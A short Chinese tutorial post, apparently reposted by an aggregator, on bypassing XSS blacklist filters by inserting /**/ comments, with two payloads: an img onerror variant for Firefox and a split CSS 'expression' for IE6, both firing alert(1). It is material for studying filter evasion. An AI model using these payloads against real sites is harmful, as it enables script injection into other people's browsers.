利用/**/来绕过黑名单

Posted xxrens

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了利用/**/来绕过黑名单相关的知识,希望对你有一定的参考价值。

火狐下:
<img/srC="x"/*%00*/oneRror=/**/alert(1)/*%00*/>
 
IE6下:
样式表中的/**/会被浏览器忽略,因此可以运用/**/来注释字符,通过插入/**/来绕过过滤如下:
 
<img src="1" style="width: exp/**/re/**/ss/**/ion(alert(‘xss‘));">
 

以上是关于利用/**/来绕过黑名单的主要内容,如果未能解决你的问题,请参考以下文章

利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单

oracle 7月份更新 CVE-2020-14625 复现&利用

文件上传骚姿势合集

利用script和scriptlet moniker绕过脚本白名单限制

.user.ini后门/上传黑名单绕过

CTF下的命令执行漏洞利用及绕过方法总结